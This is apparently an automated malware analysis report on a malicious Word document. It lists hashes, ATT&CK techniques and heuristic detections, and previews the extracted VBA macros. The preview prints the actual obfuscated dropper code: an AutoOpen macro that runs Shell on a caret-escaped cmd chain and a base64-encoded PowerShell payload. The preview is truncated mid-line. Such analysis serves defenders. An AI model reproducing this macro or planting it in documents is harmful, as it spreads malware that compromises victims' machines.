Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e97aa63a5c9612e1…

MALICIOUS

Office (OLE)

96.2 KB Created: 2018-06-06 10:47:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: 8c0226acfe6e7a2782e52a31be035f6d SHA-1: 9f560b7d2cdde4b8bff35237ac7ffa8f9139a7f8 SHA-256: e97aa63a5c9612e1144bfa3650c530a1b46767d6d19faac0918bc4144131d7d8
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro calls a function that uses the Shell() command to execute a string. This string appears to be an obfuscated command that likely downloads and executes a second-stage payload. The ClamAV detection and multiple VBA heuristics confirm its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6574812-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6574812-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11627 bytes
SHA-256: 75972920575e5c0f0a836719046152da0462aa8116116962d996ffa54ac66cd9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SZGjcNzjKFSzjh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cGkHwm()
On Error Resume Next
HiwIQ = Hex(fUvojq + Hex(fQMvA) * 51982 + Round(lnPzoc))
QCJLX = Cos(rwhCv)
pfLQf = CDate(kpuvH)
zlaOU = Cos(BToVO)
lcLcX = Hex(jJzllO + Hex(WkvEnf) * 40226 + Round(zOlocc))
BcbUR = Cos(fCpHRK)
wNMzL = CDate(zdFPAq)
XoOaov = Cos(QIWJR)
cGkHwm = bMzAIJ + Shell(jrvWRui + Chr(cQsGi + vbKeyC + Hbwzaslnc) + HKnwcMWnC + aQqDULVDRGB + mkSciOUjzNn + cwZjzA + IJZkrHQiMc + WWWFAWfNuh, 40052 - 40052)
hrhGzV = Hex(IwjCl + Hex(oipvNa) * 57645 + Round(VroPS))
CvpqC = Cos(NGFwzR)
VlbELo = CDate(GcbMJ)
naMAtr = Cos(zRMGtz)
End Function
Sub Autoopen()
On Error Resume Next
PiZtw = Hex(vImumc + Hex(GPaUdj) * 37323 + Round(nuFCHm))
DYULMk = Cos(YDiPOn)
nSNRQY = CDate(rsdMjJ)
nTqpIP = Cos(NZbPq)
cGkHwm
rWmNS = Hex(Pzbrlq + Hex(vLjqw) * 61628 + Round(UkjraF))
ZaslB = Cos(NsVFPu)
tcMbF = CDate(tUthid)
PqGmum = Cos(HpZjG)
End Sub


Attribute VB_Name = "QACqabEfhrYH"
Function HKnwcMWnC()
On Error Resume Next
oYliO = Hex(OcRHqJ + Hex(LmjIE) * 36534 + Round(piiHYh))
QiTrMo = Cos(nKBRT)
WJRSPK = CDate(CpwOrJ)
UFuiF = Cos(RztzPi)
mOTESOC = "md " + "jZMqvUMV O" + "puUvzP" + "mDWo" + "jPmrjJTf w" + "SVBnPCz &   " + "  %^c^o^m^"
FYbfq = Hex(cXfQLs + Hex(jibkF) * 99646 + Round(juhQX))
mYYQU = Cos(lpsiO)
XHjho = CDate(imrznW)
rPblL = Cos(KIfwEw)
WRPHlIwff = "S^p^E" + "^c^% " + "    %^c^o^m" + "^S^p"
wJGYq = Hex(MRisW + Hex(FsikT) * 79106 + Round(CHcnKE))
nEKsIc = Cos(YtZfSG)
JrJXEi = CDate(wbXLJ)
wITVw = Cos(JMIGq)
YQjGszi = "^E^c^%" + "     " + "/V         " + "/c  " + "         " + "set %jZkwEYREQ" + "zUiHYj%=XCJ" + "ZzLKtpOQW&&set " + "%ZVJAjuUzHbGao%" + "=p&"
tUjzJE = Hex(iwtPT + Hex(FVbpc) * 74966 + Round(zJmQZD))
wzaAlT = Cos(LNZzSS)
aUCtA = CDate(qwhXj)
IkjiQ = Cos(GVCkX)
Phwwfqkv = "&set %zKkYu" + "ziS%=o^w&&s" + "et %YSIhMn" + "TzfrbrUmS%=zzz" + "aijik&&set"
iAdtHC = Hex(KUXYpj + Hex(YzszP) * 5351 + Round(RKCcf))
ZMzHp = Cos(JPAczq)
hWzlLu = CDate(tBIdDV)
ZMpaR = Cos(sQwXPi)
iQhMEliGir = " %SUXuSvSz" + "%=!%" + "ZVJAj" + "uUzHbGao%!&" + "&set %GdzXPrHqH" + "vjwrmV%="
HKnwcMWnC = mOTESOC + WRPHlIwff + YQjGszi + Phwwfqkv + iQhMEliGir
End Function
Function aQqDULVDRGB()
On Error Resume Next
aHYUvI = Hex(VzSYqi + Hex(QYDUDU) * 52632 + Round(CKBfOm))
YcWcB = Cos(lcnhu)
zbuRjj = CDate(csuDLN)
qFNSP = Cos(zEZpCO)
mdGukY = "EmGfaSENtA&&" + "se" + "t " + "%rKaW"
HivPmJ = Hex(bIItSw + Hex(KXdZK) * 28780 + Round(hjOURA))
vBEPVC = Cos(zziQCd)
izUATc = CDate(jwQrzz)
wjuUI = Cos(jGDdwt)
ACunNEEzlPG = "lEWtuIUo%" + "=e^r&&set %VQ" + "SNEcWJW" + "NT%=!%zKkYuziS" + "%!&&se"
MawIHl = Hex(ziuUwY + Hex(OFnXW) * 9880 + Round(zQjwu))
JbtqDa = Cos(aFzIjO)
ZPmaW = CDate(vRBPFa)
PNKPLN = Cos(jYoDQ)
VZZQMjdX = "t %roGwXJC" + "%=s&&set %tsOq" + "npoXbjnwink%=" + "jZG" + "USNbfWwcz&&" + "set %i" + "FwzciIaE" + "%=he&&s"
aaIIf = Hex(IBojiJ + Hex(KmsZil) * 57246 + Round(iNviwW))
TBaiK = Cos(JVJtjR)
nbdfF = CDate(DQrzKS)
mrMMZi = Cos(zhnIv)
wAzjGbQlzCS = "et %OHnSqG" + "Yjvkh%=ll&&!%S" + "UXuSvSz%!!%V" + "QSNEcWJWNT%" + "!!" + "%rKaW" + "lEWtuIUo" + "%!!%roGwXJC%!!%"
cARifu = Hex(MwHjQ + Hex(LStcBQ) * 31676 + Round(MSIwT))
AUFoV = Cos(HJDzIT)
zankc = CDate(zXwDFl)
fbQhIm = Cos(tSrtS)
NBBHlciiBl = "iFwzciIaE%!" + "!%OHnS" + "qGYjvkh%!  -e I" + "AAoA" + "E4ARQBXA" + "C0AbwBiAGoAZQBD"
jVBPu = Hex(hBRzY + Hex(jAWdBQ) * 954 + Round(dEjtV))
WHVjiu = Cos(OPbWj)
lEqNd = CDate(AclpQR)
sQkcpI = Cos(DwZflO)
wvPdWQ = "AFQAIABTA" + "FkAUwBUAEUAb" + "QAuAGkATwAuA" + "EMAbwBtAF" + "AAcgB" + "lAHMAUwBpAE"
QRkuHS = Hex(OwnqC + Hex(VOkSF) * 29066 + Round(BBinm))
oGpiL = Cos(ONkLBu)
wUiSw = CDate(nGZoLH)
VHcPmz = Cos(tdAYU)
EQfop = "8AbgAuAEQAZQBm" + "AG" + "wA" + "YQBUAG" + "UAc" + "wB0AFIAZQB" + "BAG0AKAAg" + "AFsAaQBvAC4Ab" + "QBFAE0AbwBSAF" + "kAcwB0AFI"
NnokDj = Hex(vQmXi + H
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.